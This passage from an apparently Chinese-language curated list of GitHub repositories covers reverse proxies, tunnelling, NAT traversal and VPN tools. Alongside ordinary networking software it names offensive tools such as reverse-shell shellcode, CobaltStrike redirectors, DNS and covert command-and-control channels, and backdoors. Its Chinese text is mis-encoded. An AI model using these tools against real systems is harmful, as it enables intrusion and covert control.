[andychiare/netcore2-reverse-proxy](https://github.com/andychiare/netcore2-reverse-proxy) An example of how to implement a reverse proxy in .NET Core 2 - [**42**ๆ˜Ÿ][4m] [Py] [4n4nk3/tinkerershell](https://github.com/4n4nk3/tinkerershell) A simple python reverse shell written just for fun. - [**42**ๆ˜Ÿ][2y] [Shell] [taherio/redi](https://github.com/taherio/redi) Automated script for setting up CobaltStrike redirectors (nginx reverse proxy, letsencrypt) - [**40**ๆ˜Ÿ][9m] [C#] [azure/reverse-proxy-dotnet](https://github.com/azure/reverse-proxy-dotnet) Reverse Proxy agent - [**39**ๆ˜Ÿ][2y] [Go] [googlecloudplatform/stackdriver-reverse-proxy](https://github.com/googlecloudplatform/stackdriver-reverse-proxy) Simple HTTP proxy to automatically traces the incoming requests - [**38**ๆ˜Ÿ][4y] [Assembly] [sh3llc0d3r1337/windows_reverse_shell_1](https://github.com/sh3llc0d3r1337/windows_reverse_shell_1) Windows Reverse Shell shellcode - [**34**ๆ˜Ÿ][1y] [JS] [franciscoknebel/nginx-reverseproxy](https://github.com/franciscoknebel/nginx-reverseproxy) A simple implementation of a multidomain nginx reverse proxy, using Node apps. - [**33**ๆ˜Ÿ][7m] [flyfishsec/rsgen](https://github.com/flyfishsec/rsgen) An Universal Reverse Shell Command Genrator. - [**29**ๆ˜Ÿ][4y] [PS] [ahhh/wifi_trojans](https://github.com/ahhh/wifi_trojans) A collection of wireless based bind and reverse connect shells for penetration testers to use in demonstrating persistence to a network via rouge access points. - [**27**ๆ˜Ÿ][10m] [Rust] [felipenoris/hyper-reverse-proxy](https://github.com/felipenoris/hyper-reverse-proxy) A simple reverse proxy for use with Hyper and Tokio - [**23**ๆ˜Ÿ][2y] [C] [p4p1/p4p1](https://github.com/p4p1/p4p1) Reverse shell for remote administration - [**22**ๆ˜Ÿ][4d] [TS] [cedx/reverse-proxy.js](https://github.com/cedx/reverse-proxy.js) Personal reverse proxy server supporting WebSockets. - [**5**ๆ˜Ÿ][7m] [PS] [audibleblink/gorsh](https://github.com/audibleblink/gorsh) A Golang Reverse Shell w/ a Tmux-driven psuedo-C2 Interface ### <a id="9d6789f22a280f5bb6491d1353b02384"></a>้šง้“&&็ฉฟ้€ - [**4690**ๆ˜Ÿ][4d] [Go] [ginuerzh/gost](https://github.com/ginuerzh/gost) GO่ฏญ่จ€ๅฎž็Žฐ็š„ๅฎ‰ๅ…จ้šง้“ - [**3465**ๆ˜Ÿ][5m] [Go] [jpillora/chisel](https://github.com/jpillora/chisel) ๅŸบไบŽHTTP็š„ๅฟซ้€Ÿ TCP ้šง้“ - [**3359**ๆ˜Ÿ][5m] [C++] [wangyu-/udp2raw-tunnel](https://github.com/wangyu-/udp2raw-tunnel) udp ๆ‰“ๆดžใ€‚้€š่ฟ‡raw socket็ป™UDPๅŒ…ๅŠ ไธŠTCPๆˆ–ICMP header๏ผŒ่ฟ›่€Œ็ป•่ฟ‡UDPๅฑ่”ฝๆˆ–QoS๏ผŒๆˆ–ๅœจUDPไธ็จณๅฎš็š„็Žฏๅขƒไธ‹ๆๅ‡็จณๅฎšๆ€ง - [**3227**ๆ˜Ÿ][4m] [C] [yarrick/iodine](https://github.com/yarrick/iodine) ้€š่ฟ‡DNSๆœๅŠกๅ™จไผ ่พ“(tunnel)IPV4ๆ•ฐๆฎ - [**2862**ๆ˜Ÿ][9m] [C++] [wangyu-/udpspeeder](https://github.com/wangyu-/udpspeeder) A Tunnel which Improves your Network Quality on a High-latency Lossy Link by using Forward Error Correction,for All Traffics(TCP/UDP/ICMP) - [**2509**ๆ˜Ÿ][3y] [C] [dhavalkapil/icmptunnel](https://github.com/dhavalkapil/icmptunnel) Transparently tunnel your IP traffic through ICMP echo and reply packets. - [**2180**ๆ˜Ÿ][2m] [Go] [mmatczuk/go-http-tunnel](https://github.com/mmatczuk/go-http-tunnel) Fast and secure tunnels over HTTP/2 - [**1826**ๆ˜Ÿ][6m] [C++] [iagox86/dnscat2](https://github.com/iagox86/dnscat2) ๅœจ DNS ๅ่ฎฎไธŠๅˆ›ๅปบๅŠ ๅฏ†็š„ C&C channel - [**1741**ๆ˜Ÿ][2y] [Go] [vzex/dog-tunnel](https://github.com/vzex/dog-tunnel) p2p tunnel,(udp mode work with kcp, - [**1480**ๆ˜Ÿ][6y] [C] [alibaba/lvs](https://github.com/alibaba/lvs) A distribution of Linux Virtual Server with some advanced features. It introduces a new packet forwarding method - FULLNAT other than NAT/Tunneling/DirectRouting, and defense mechanism against synflooding attack - SYNPROXY. - [**1345**ๆ˜Ÿ][2m] [Go] [davrodpin/mole](https://github.com/davrodpin/mole) cli app to create ssh tunnels - [**1192**ๆ˜Ÿ][3y] [Roff] [matiasinsaurralde/facebook-tunnel](https://github.com/matiasinsaurralde/facebook-tunnel) Tunneling Internet traffic over Facebook chat. - [**928**ๆ˜Ÿ][1m] [Go] [square/ghostunnel](https://github.com/square/ghostunnel) A simple SSL/TLS proxy with mutual authentication for securing non-TLS services - [**809**ๆ˜Ÿ][4m] [Py] [secforce/tunna](https://github.com/secforce/tunna) Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments. - [**682**ๆ˜Ÿ][15d] [JS] [sadeghhayeri/greentunnel](https://github.com/sadeghhayeri/greentunnel) Green Tunnel is an anti-censorship utility designed to bypass DPI system that are put in place by various ISPs to block access to certain websites. - [**626**ๆ˜Ÿ][6d] [Go] [antoniomika/sish](https://github.com/antoniomika/sish) An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH. - [**621**ๆ˜Ÿ][5m] [JS] [derhuerst/tcp-over-websockets](https://github.com/derhuerst/tcp-over-websockets) Tunnel TCP through WebSockets. - [**601**ๆ˜Ÿ][3d] [Go] [cloudflare/cloudflared](https://github.com/cloudflare/cloudflared) Argo Tunnel client - [**596**ๆ˜Ÿ][19d] [Py] [trustedsec/trevorc2](https://github.com/trustedsec/trevorc2) ้€š่ฟ‡ๆญฃๅธธ็š„ๅฏๆต่งˆ็š„็ฝ‘็ซ™้š่— C&C ๆŒ‡ไปค็š„ๅฎขๆˆท็ซฏ/ๆœๅŠกๅ™จๆจกๅž‹๏ผŒๅ› ไธบๆ—ถ้—ด้—ด้š”ไธๅŒ๏ผŒๆฃ€ๆต‹ๅ˜ๅพ—ๆ›ดๅŠ ๅ›ฐ้šพ๏ผŒๅนถไธ”่Žทๅ–ไธปๆœบๆ•ฐๆฎๆ—ถไธไผšไฝฟ็”จ POST ่ฏทๆฑ‚ - [**592**ๆ˜Ÿ][3m] [Py] [pahaz/sshtunnel](https://github.com/pahaz/sshtunnel) SSH tunnels to remote server. - [**560**ๆ˜Ÿ][1y] [Go] [cw1997/natbypass](https://github.com/cw1997/natbypass) ๅ†…็ฝ‘็ฉฟ้€๏ผŒ็ซฏๅฃ่ฝฌๅ‘ๅทฅๅ…ท - [**486**ๆ˜Ÿ][5d] [Go] [psiphon-labs/psiphon-tunnel-core](https://github.com/psiphon-labs/psiphon-tunnel-core) Psiphon client and server components implemented in Go. These components provides core tunnel functionality, handling all aspects of evading blocking and relaying traffic through Psiphon. - [**465**ๆ˜Ÿ][3y] [Py] [trustedsec/meterssh](https://github.com/trustedsec/meterssh) MeterSSH is a way to take shellcode, inject it into memory then tunnel whatever port you want to over SSH to mask any type of communications as a normal SSH connection. The way it works is by injecting shellcode into memory, then wrapping a port spawned (meterpeter in this case) by the shellcode over SSH back to the attackers machine. Then conneโ€ฆ - [**403**ๆ˜Ÿ][10m] [Go] [evilsocket/shellz](https://github.com/evilsocket/shellz) shellz is a small utility to track and control your ssh, telnet, web and custom shells and tunnels. - [**401**ๆ˜Ÿ][3m] [C] [liudf0716/xkcptun](https://github.com/liudf0716/xkcptun) xkcptun is kcp tunnel for OpenWRT&LEDE, implemented in c language - [**385**ๆ˜Ÿ][1y] [Ruby] [aphyr/tund](https://github.com/aphyr/tund) SSH reverse tunnel daemon - [**375**ๆ˜Ÿ][3y] [Go] [q3k/crowbar](https://github.com/q3k/crowbar) Tunnel TCP over a plain HTTP session (warning: mediocre Go code) - [**357**ๆ˜Ÿ][1y] [C] [emptymonkey/revsh](https://github.com/emptymonkey/revsh) A reverse shell with terminal support, data tunneling, and advanced pivoting capabilities. - [**334**ๆ˜Ÿ][10m] [JS] [mhzed/wstunnel](https://github.com/mhzed/wstunnel) tunnel over websocket - [**327**ๆ˜Ÿ][3y] [JS] [qgy18/pangolin](https://github.com/qgy18/pangolin) A light weight http tunnels to localhost. - [**327**ๆ˜Ÿ][18d] [C#] [tmoonlight/nsmartproxy](https://github.com/tmoonlight/nsmartproxy) ๅ†…็ฝ‘็ฉฟ้€ๅทฅๅ…ทใ€‚้‡‡็”จ.NET CORE็š„ๅ…จๅผ‚ๆญฅๆจกๅผๆ‰“้€  - [**326**ๆ˜Ÿ][2m] [C] [xelerance/xl2tpd](https://github.com/xelerance/xl2tpd) an implementation of the Layer 2 Tunnelling Protocol (RFC 2661) - [**317**ๆ˜Ÿ][3y] [C++] [pipesocks/pipesocks](https://github.com/pipesocks/pipesocks) A pipe-like SOCKS5 tunnel system. - [**303**ๆ˜Ÿ][9m] [C++] [wangyu-/udp2raw-multiplatform](https://github.com/wangyu-/udp2raw-multiplatform) multi-platform(cross-platform) version of udp2raw-tunnel, which supports Windows/Mac/BSD natively - [**298**ๆ˜Ÿ][9m] [C] [basil00/reqrypt](https://github.com/basil00/reqrypt) HTTP ่ฏทๆฑ‚ tunneling ๅทฅๅ…ท - [**266**ๆ˜Ÿ][14d] [Py] [earthquake/xfltreat](https://github.com/earthquake/xfltreat) XFLTReaT tunnelling framework - [**265**ๆ˜Ÿ][4m] [Go] [skx/tunneller](https://github.com/skx/tunneller) Allow internal services, running on localhost, to be accessed over the internet.. - [**249**ๆ˜Ÿ][3y] [C] [jamesbarlow/icmptunnel](https://github.com/jamesbarlow/icmptunnel) Tunnel IP over ICMP. - [**244**ๆ˜Ÿ][10m] [C] [pegasuslab/ghosttunnel](https://github.com/PegasusLab/GhostTunnel) GhostTunnel is a covert backdoor transmission method that can be used in an isolated environment. - [**233**ๆ˜Ÿ][2y] [C] [larsbrinkhoff/httptunnel](https://github.com/larsbrinkhoff/httptunnel) Bidirectional data stream tunnelled in HTTP requests. - [**210**ๆ˜Ÿ][12m] [Go] [ooclab/otunnel](https://github.com/ooclab/otunnel) peer-to-peer tunnel tool - [**197**ๆ˜Ÿ][18d] [Go] [esrrhs/pingtunnel](https://github.com/esrrhs/pingtunnel) a tool that advertises tcp/udp/sock5 traffic as icmp traffic for forwarding.ๆต้‡่ฝฌๅ‘ๅทฅๅ…ท. - [**191**ๆ˜Ÿ][3y] [Go] [koding/tunnel](https://github.com/koding/tunnel) Tunnel proxy package in Go - [**179**ๆ˜Ÿ][6m] [C#] [nettitude/sharpsocks](https://github.com/nettitude/sharpsocks) Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell - [**170**ๆ˜Ÿ][1y] [C#] [eaglexiang/eagle.tunnel.dotnet.core](https://github.com/eaglexiang/eagle.tunnel.dotnet.core) ็จณๅฎšๆ˜“็”จ็š„ไปฃ็†ๅทฅๅ…ท - [**170**ๆ˜Ÿ][4d] [ObjC] [subito-it/sbtuitesttunnel](https://github.com/subito-it/sbtuitesttunnel) Enable network mocks and more in UI Tests - [**169**ๆ˜Ÿ][9m] [Go] [mimah/gomet](https://github.com/mimah/gomet) Multi-platform agent written in Golang. TCP forwarding, socks5, tunneling, pivoting, shell, download, exec - [**166**ๆ˜Ÿ][3y] [Haskell] [corsis/portfusion](https://github.com/corsis/portfusion) ่ทจๅนณๅฐไผ ่พ“ๅฑ‚ๅˆ†ๅธƒๅผๅๅ‘/ๆญฃๅ‘ไปฃ็†ๅ’Œ้šง้“่งฃๅ†ณๆ–นๆกˆ - [**153**ๆ˜Ÿ][4y] [Go] [inconshreveable/go-tunnel](https://github.com/inconshreveable/go-tunnel) [DEPRECATED] Tunnel to localhost as a library - [**132**ๆ˜Ÿ][14d] [Go] [inlets/inletsctl](https://github.com/inlets/inletsctl) Fast HTTP (L7) and TCP (L4) tunnels written in Go - [**129**ๆ˜Ÿ][1y] [Py] [deepzec/grok-backdoor](https://github.com/deepzec/grok-backdoor) Simple python backdoor with Ngrok tunnel support - [**119**ๆ˜Ÿ][12m] [CSS] [rootkiter/earthworm](https://github.com/rootkiter/earthworm) Tool for tunnel - [**118**ๆ˜Ÿ][12m] [Shell] [patpadgett/corkscrew](https://github.com/patpadgett/corkscrew) Corkscrew is a tool for tunneling SSH through HTTP proxies. - [**117**ๆ˜Ÿ][4y] [Go] [tutumcloud/ngrok](https://github.com/tutumcloud/ngrok) Introspected tunnels to localhost - [**115**ๆ˜Ÿ][3m] [Go] [eaglexiang/eagle.tunnel.go](https://github.com/eaglexiang/eagle.tunnel.go) ็จณๅฎš็š„ไปฃ็†ๅทฅๅ…ท๏ผŒๆฏ”.NET็‰ˆๆœฌๆ›ด่ฝป้‡ๅ’Œๆ˜“็”จ - [**115**ๆ˜Ÿ][3m] [PS] [jcqsteven/ghosttunnel](https://github.com/jcqsteven/ghosttunnel) ๅŸบไบŽ360ๆๅ‡บ็š„Ghost Tunnelๆ”ปๅ‡ปๅค็Žฐ - [**113**ๆ˜Ÿ][8m] [C] [jakkarth/icmptx](https://github.com/jakkarth/icmptx) IP-over-ICMP tunnel - [**106**ๆ˜Ÿ][3y] [C] [greensea/mptunnel](https://github.com/greensea/mptunnel) MPUDP Tunnel (User space MultiPath UDP) - [**104**ๆ˜Ÿ][2y] [Java] [ggrandes/bouncer](https://github.com/ggrandes/bouncer) Bouncer is a network TCP port redirector/forward proxy (like rinetd) with extra features like Reverse tunneling (like ssh -R), SSL tunneling (like stunnel), connection Failover, LoadBalancing and Clustering. In pure Java (BIO) - [**100**ๆ˜Ÿ][10m] [Go] [superfly/wormhole](https://github.com/superfly/wormhole) Fly.io secure tunnel - [**97**ๆ˜Ÿ][10m] [Shell] [sskaje/6in4](https://github.com/sskaje/6in4) IPv6-in-IPv4 Tunnel Server - [**94**ๆ˜Ÿ][4y] [JS] [ro31337/hacktunnel](https://github.com/ro31337/hacktunnel) HackTunnel is web-based peer-to-peer chat software for anonymous and encrypted communication written with Go language - [**94**ๆ˜Ÿ][6y] [C++] [stealth/fraud-bridge](https://github.com/stealth/fraud-bridge) ICMP and DNS tunneling via IPv4 and IPv6 - [**93**ๆ˜Ÿ][1y] [Go] [tarlogicsecurity/sasshimi](https://github.com/tarlogicsecurity/sasshimi) SSH Tunnelling in "RAW mode", via STDIN/OUT without using forwarding channels - [**90**ๆ˜Ÿ][4y] [JS] [adafruit/adafruit-io-node](https://github.com/adafruit/adafruit-io-node) A Node.js Adafruit IO Node.js Client, Local Server, & io.adafruit.com TLS Tunnel. - [**83**ๆ˜Ÿ][5y] [C] [chokepoint/crypthook](https://github.com/chokepoint/crypthook) TCP/UDP symmetric encryption tunnel wrapper - [**83**ๆ˜Ÿ][2y] [Makefile] [kingsquare/docker-tunnel](https://github.com/kingsquare/docker-tunnel) a (simple) dockerized ssh tunnel - [**81**ๆ˜Ÿ][1y] [Java] [googlecreativelab/tunnelvision](https://github.com/googlecreativelab/tunnelvision) Distort your surroundings through a collection of transformative filters - [**79**ๆ˜Ÿ][1y] [Py] [cdhowie/netflix-no-ipv6-dns-proxy](https://github.com/cdhowie/netflix-no-ipv6-dns-proxy) Fix for Netflix blocking various IPv6 tunnels by returning no results for AAAA queries of Netflix domains - [**77**ๆ˜Ÿ][5y] [C] [bishopfox/firecat](https://github.com/bishopfox/firecat) Firecat is a penetration testing tool that allows you to punch reverse TCP tunnels out of a compromised network. - [**69**ๆ˜Ÿ][3y] [Nginx] [localtunnel/nginx](https://github.com/localtunnel/nginx) nginx container used as the localtunnel load balancer - [**68**ๆ˜Ÿ][2y] [Go] [lubyruffy/tcptunnel](https://github.com/lubyruffy/tcptunnel) ๅฐ†ๆœฌๅœฐๅ†…็ฝ‘ๆœๅŠกๅ™จๆ˜ ๅฐ„ๅˆฐๅ…ฌ็ฝ‘ใ€‚ - [**68**ๆ˜Ÿ][3m] [Java] [netspi/burpcollaboratordnstunnel](https://github.com/netspi/burpcollaboratordnstunnel) A DNS tunnel utilizing the Burp Collaborator - [**68**ๆ˜Ÿ][3d] [C#] [sailro/bdtunnel](https://github.com/sailro/bdtunnel) BoutDuTunnel is able to create virtual connections tunnelled in HTTP requests. - [**67**ๆ˜Ÿ][1y] [C++] [oyyd/nysocks](https://github.com/oyyd/nysocks) Nysocks binds kcp and libuv to provide an aggressive tcp tunnel in nodejs. - [**66**ๆ˜Ÿ][8m] [C] [v-e-o/rdp2tcp](https://github.com/v-e-o/rdp2tcp) rdp2tcp: open tcp tunnel through remote desktop connection. - [**65**ๆ˜Ÿ][2m] [JS] [snail007/anytunnel](https://github.com/snail007/anytunnel) ๅ†…็ฝ‘็ฉฟ้€๏ผŒๅ†…็ฝ‘็ฉฟ้€ไปฃ็†ๆœๅŠกๅ™จ๏ผŒๅ•†็”จๅ†…็ฝ‘็ฉฟ้€ไปฃ็†็ณป็ปŸ๏ผŒๅ†…็ฝ‘็ฉฟ้€ๅนณๅฐ๏ผŒๅ†…็ฝ‘็ฉฟ้€ๅคš็”จๆˆทไผšๅ‘˜็ณป็ปŸใ€‚ - [**64**ๆ˜Ÿ][9m] [Go] [dsnezhkov/sshorty](https://github.com/dsnezhkov/sshorty) A progressive, customizable armored SSH tunnel implant for Linux and MacOS systems - [**64**ๆ˜Ÿ][8m] [Go] [smithclay/faassh](https://github.com/smithclay/faassh) simple go SSH server with reverse tunneling designed for running in cloud functions like AWS lambda - [**61**ๆ˜Ÿ][2y] [C] [convisoappsec/firefox_tunnel](https://github.com/convisoappsec/firefox_tunnel) ไฝฟ็”จFirefoxๆฅๅปบ็ซ‹่ฟœ็จ‹้€šไฟก้šง้“, ไฝฟ็”จcookie.sqlite/html/jsๅฎž็ŽฐpayloadไธŠไผ ไธ‹่ฝฝ - [**60**ๆ˜Ÿ][17d] [C] [lnslbrty/ptunnel-ng](https://github.com/lnslbrty/ptunnel-ng) Tunnel TCP connections through ICMP. - [**59**ๆ˜Ÿ][7m] [JS] [mdslab/wstun](https://github.com/mdslab/wstun) Tunnels and reverse tunnels over WebSocket - [**58**ๆ˜Ÿ][3y] [Py] [epinna/stegosip](https://github.com/epinna/stegosip) TCP tunnel over RTP/SIP - [**57**ๆ˜Ÿ][4y] [Py] [t3rry7f/badtunnel_exp](https://github.com/t3rry7f/badtunnel_exp) Usage: python badtunnel.py wpad_server_ip - [**49**ๆ˜Ÿ][2y] [C] [coolervoid/firefox_tunnel](https://github.com/coolervoid/firefox_tunnel) The way to use firefox to make a tunnel to remote communication, bypass any firewall - [**49**ๆ˜Ÿ][9d] [Go] [sandertv/gophertunnel](https://github.com/sandertv/gophertunnel) A Minecraft (Bedrock Edition) library written in Go used for creating proxies, servers, clients and tools - [**48**ๆ˜Ÿ][3m] [Go] [rancher/remotedialer](https://github.com/rancher/remotedialer) HTTP in TCP in Websockets in HTTP in TCP, Tunnel all the things! - [**46**ๆ˜Ÿ][7m] [Go] [ice-ice/dnstunnel](https://github.com/ice-ice/dnstunnel) dns tunnel backdoor DNS้šง้“ๅŽ้—จ - [**43**ๆ˜Ÿ][8m] [Py] [jmagnusson/bgtunnel](https://github.com/jmagnusson/bgtunnel) Initiate SSH tunnels in the background in python - [**43**ๆ˜Ÿ][3y] [Go] [madeye/obfs4-tunnel](https://github.com/madeye/obfs4-tunnel) obfs4 tunnel - [**42**ๆ˜Ÿ][7m] [Go] [aschzero/hera](https://github.com/aschzero/hera) Automated secure tunnels for containers using Cloudflare Argo - [**40**ๆ˜Ÿ][7m] [Go] [function61/holepunch-client](https://github.com/function61/holepunch-client) Totally self-contained SSH reverse tunnel written in Go - [**40**ๆ˜Ÿ][2m] [Go] [opencoff/go-tunnel](https://github.com/opencoff/go-tunnel) TLS/SSL Tunnel - A modern STunnel replacement written in golang - [**39**ๆ˜Ÿ][2y] [Py] [bonelee/dns_tunnel_dectect_with_cnn](https://github.com/bonelee/dns_tunnel_dectect_with_cnn) dns tunnel dectect with CNN - [**38**ๆ˜Ÿ][1y] [JS] [lmammino/webhook-tunnel](https://github.com/lmammino/webhook-tunnel) A little HTTP proxy suitable to create tunnels for webhook endpoints protected behind a firewall or a VPN - [**38**ๆ˜Ÿ][2y] [Java] [quhw/xtunnel](https://github.com/quhw/xtunnel) An useful TCP/SSL tunnel utility. - [**37**ๆ˜Ÿ][2y] [JS] [kevva/caw](https://github.com/kevva/caw) Construct HTTP/HTTPS agents for tunneling proxies - [**32**ๆ˜Ÿ][3y] [Go] [mwitkow/go-http-dialer](https://github.com/mwitkow/go-http-dialer) Go net.Dialer for HTTP(S) CONNECT Tunneling. - [**32**ๆ˜Ÿ][3y] [Go] [localtunnel/go-localtunnel](https://github.com/localtunnel/go-localtunnel) golang client library for localtunnel.me - [**28**ๆ˜Ÿ][3y] [JS] [markelog/adit](https://github.com/markelog/adit) SSH tunnels โ€“ in any way you want it - [**27**ๆ˜Ÿ][2y] [Go] [jsimonetti/tlstun](https://github.com/jsimonetti/tlstun) A socks tunnel client and server using websockets over http and tls - [**27**ๆ˜Ÿ][11m] [C#] [kostapc/putty-tunnel-manager](https://github.com/kostapc/putty-tunnel-manager) Fixes and new release. PuTTY Tunnel Manager allows you to easily open tunnels, that are defined in a PuTTY session, from the system tray. You can also move the tunnels from PuTTY to PuTTY Tunnel Manager. This allows you to use PuTTY just for SSH shell sessions (without opening tunnels), and use PuTTY Tunnel Manager just for tunneling. - [**26**ๆ˜Ÿ][4y] [Shell] [hrishioa/nomohead](https://github.com/hrishioa/nomohead) Simple Bash script that announces IP Address and ngrok tunnel of Raspberry Pi at boot - [**26**ๆ˜Ÿ][6m] [CSS] [remmina/et-electron](https://github.com/remmina/et-electron) Eagle Tunnel ็š„ๅ›พๅฝขๅŒ–ๅฎขๆˆท็ซฏ๏ผŒไธ€ไธช็ฎ€ๅ•็š„ไปฃ็†ๅทฅๅ…ท - [**26**ๆ˜Ÿ][7m] [Py] [rofl0r/nat-tunnel](https://github.com/rofl0r/nat-tunnel) NAT Tunnel: to effortlessly serve from behind NAT - [**25**ๆ˜Ÿ][1y] [Go] [rsrdesarrollo/sasshimi](https://github.com/rsrdesarrollo/sasshimi) SSH Tunnelling in "RAW mode", via STDIN/OUT without using forwarding channels - [**24**ๆ˜Ÿ][1y] [Go] [root-gg/wsp](https://github.com/root-gg/wsp) HTTP tunnel over Websocket - [**23**ๆ˜Ÿ][2y] [Go] [gnolizuh/quictun](https://github.com/gnolizuh/quictun) The simplest tunnel service based on QUIC. - [**23**ๆ˜Ÿ][4m] [Py] [jonathansalwan/x-tunnel-opaque-predicates](https://github.com/jonathansalwan/x-tunnel-opaque-predicates) IDA+Triton plugin in order to extract opaque predicates using a Forward-Bounded DSE. Example with X-Tunnel. - [**21**ๆ˜Ÿ][2y] [Py] [krrr/wstan](https://github.com/krrr/wstan) Tunneling TCP in WebSocket (ssh -D alternative) - [**20**ๆ˜Ÿ][2y] [C] [izuolan/pshell](https://github.com/izuolan/pshell) ICMP/IP tunnel manager for Linux. - [**19**ๆ˜Ÿ][2m] [C++] [markopaul0/datagramtunneler](https://github.com/markopaul0/datagramtunneler) Simple C++ cross-platform client/server app forwarding UDP datagrams through a TCP connection. - [**18**ๆ˜Ÿ][7m] [Go] [dsnet/sshtunnel](https://github.com/dsnet/sshtunnel) SSH daemon for creating forward and reverse tunnels. - [**17**ๆ˜Ÿ][4y] [Py] [notsosecure/icmp_tunnel_ex_filtrate](https://github.com/notsosecure/icmp_tunnel_ex_filtrate) Code snippet accompanying blog post - [**14**ๆ˜Ÿ][2m] [Py] [codepr/aiotunnel](https://github.com/codepr/aiotunnel) HTTP tunnel on top of aiohttp and asyncio - [**14**ๆ˜Ÿ][2m] [Java] [testingbot/testingbot-tunnel](https://github.com/testingbot/testingbot-tunnel) Tunnel to run Cloud Selenium tests on your local computer - [**8**ๆ˜Ÿ][1y] [C] [lalawue/m_tunnel](https://github.com/lalawue/m_tunnel) A Secure Tunnel with SOCKS5 Proxy Interface, support Linux/MacOS/FreeBSD/Windows - [**8**ๆ˜Ÿ][1y] [C++] [mrdoulestar/yunsle_ghost_tunnel](https://github.com/mrdoulestar/yunsle_ghost_tunnel) ๅฐ่ฏ•ๅฎž็Žฐไธ€ไธ‹Ghost Tunnelไธญ็š„้€šไฟกๆ–นๅผ - [**4**ๆ˜Ÿ][4y] [Haskell] [bearice/tunnel-manager](https://github.com/bearice/tunnel-manager) HTTP API to manage PPTP2HTTP tunnels - [**4**ๆ˜Ÿ][2y] [JS] [bubuflystudio/bbtunnel](https://github.com/bubuflystudio/bbtunnel) ๅŸบไบŽ socksv5 ็š„ๅ†…็ฝ‘็ฉฟ้€ๅทฅๅ…ท - [**4**ๆ˜Ÿ][3y] [PHP] [cristianefe/mysqltunnel](https://github.com/cristianefe/mysqltunnel) A http MySQL remote tunnel - [**3**ๆ˜Ÿ][4m] [C++] [osrdrivers/tunnel](https://github.com/osrdrivers/tunnel) Demonstrate the behavior of the tunnel cache on Windows - [**2**ๆ˜Ÿ][4m] [Dockerfile] [robzhu/nginx-local-tunnel](https://github.com/robzhu/nginx-local-tunnel) A docker container that redirects incoming HTTP traffic to a local port for reverse SSH tunneling - [**1**ๆ˜Ÿ][2y] [C++] [kkkkke/udp2raw-tunnel](https://github.com/kkkkke/udp2raw-tunnel) A Tunnel which Turns UDP Traffic into Encrypted UDP/FakeTCP/ICMP Traffic by using Raw Socket,helps you Bypass UDP FireWalls(or Unstable UDP Environment),Anti-Replay-Attack - [**0**ๆ˜Ÿ][1y] [PS] [jerryma0912/ghosttunnel](https://github.com/jerryma0912/ghosttunnel) ๅŸบไบŽ360ๆๅ‡บ็š„Ghost Tunnelๆ”ปๅ‡ปๅค็Žฐ ### <a id="8ea8f890cf767c3801b5e7951fca3570"></a>ๅ…ฌ็ฝ‘่ฎฟ้—ฎๅฑ€ๅŸŸ็ฝ‘ - [**31162**ๆ˜Ÿ][25d] [Go] [fatedier/frp](https://github.com/fatedier/frp) ๅฟซ้€Ÿ็š„ๅๅ‘ไปฃ็†, ๅฐ†NATๆˆ–้˜ฒ็ซๅข™ไน‹ๅŽ็š„ๆœฌๅœฐๆœๅŠกๅ™จๆšด้œฒๅˆฐๅ…ฌ็ฝ‘ - [**9330**ๆ˜Ÿ][3m] [JS] [localtunnel/localtunnel](https://github.com/localtunnel/localtunnel) expose yourself - [**5047**ๆ˜Ÿ][7d] [Go] [inlets/inlets](https://github.com/inlets/inlets) Expose your local endpoints to the Internet - [**1264**ๆ˜Ÿ][10d] [JS] [bubenshchykov/ngrok](https://github.com/bubenshchykov/ngrok) Expose your localhost to the web. Node wrapper for ngrok. - [**949**ๆ˜Ÿ][4m] [Py] [christophetd/cloudflair](https://github.com/christophetd/cloudflair) a tool to find origin servers of websites protected by CloudFlare who are publicly exposed and don't restrict network access to the CloudFlare IP ranges as they should *** ## <a id="c8cc22e067df97d3c58ac53b91ebe240"></a>ๆ–‡็ซ  # <a id="891b953fda837ead9eff17ff2626b20a"></a>VPN *** ## <a id="d62a971d37c69db9f3b9187318c3921a"></a>ๅทฅๅ…ท - [**16279**ๆ˜Ÿ][10d] [Py] [trailofbits/algo](https://github.com/trailofbits/algo) algo๏ผšAnsible ่„šๆœฌ๏ผˆๅŸบไบŽPython๏ผ‰๏ผŒ็ฎ€ๅŒ–้…็ฝฎ็งไบบ IPSEC VPN ็š„่ฟ‡็จ‹๏ผŒ้ป˜่ฎคไฝฟ็”จๆœ€ๅฎ‰ๅ…จ็š„้…็ฝฎ๏ผŒๆ”ฏๆŒๅธธ่งไบ‘ๆไพ›ๅ•†๏ผŒๅนถไธ”ๅคงๅคšๆ•ฐ่ฎพๅค‡้ƒฝไธ้œ€่ฆๅฎขๆˆท็ซฏ - [**12171**ๆ˜Ÿ][1m] [Shell] [hwdsl2/setup-ipsec-vpn](https://github.com/hwdsl2/setup-ipsec-vpn) Scripts to build your own IPsec VPN server, with IPsec/L2TP and Cisco IPsec on Ubuntu, Debian and CentOS - [**10735**ๆ˜Ÿ][] [Go] [txthinking/brook](https://github.com/txthinking/brook) Go่ฏญ่จ€็ผ–ๅ†™็š„่ทจๅนณๅฐไปฃ็† - [**7613**ๆ˜Ÿ][3m] [Py] [sovereign/sovereign](https://github.com/sovereign/sovereign) A set of Ansible playbooks to build and maintain your own private cloud: email, calendar, contacts, file sync, IRC bouncer, VPN, and more. - [**4548**ๆ˜Ÿ][17d] [C] [jedisct1/dsvpn](https://github.com/jedisct1/dsvpn) A Dead Simple VPN. - [**4449**ๆ˜Ÿ][1y] [Py] [sshuttle/sshuttle](https://github.com/sshuttle/sshuttle) Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling. - [**4049**ๆ˜Ÿ][2m] [Swift] [lexrus/vpnon](https://github.com/lexrus/vpnon) Turn On your VPN like a hero. - [**3773**ๆ˜Ÿ][17d] [jjqqkk/chromium](https://github.com/jjqqkk/chromium) Chromium browser with SSL VPN. Use this browser to unblock websites. - [**3243**ๆ˜Ÿ][6d] [Shell] [gfw-breaker/ssr-accounts](https://github.com/gfw-breaker/ssr-accounts) ไธ€้”ฎ้ƒจ็ฝฒShadowsocksๆœๅŠก๏ผ›ๅ…่ดนShadowsocks่ดฆๅทๅˆ†ไบซ๏ผ›ๅ…่ดนSS่ดฆๅทๅˆ†ไบซ; ็ฟปๅข™๏ผ›ๆ— ็•Œ๏ผŒ่‡ช็”ฑ้—จ๏ผŒSquirrelVPN - 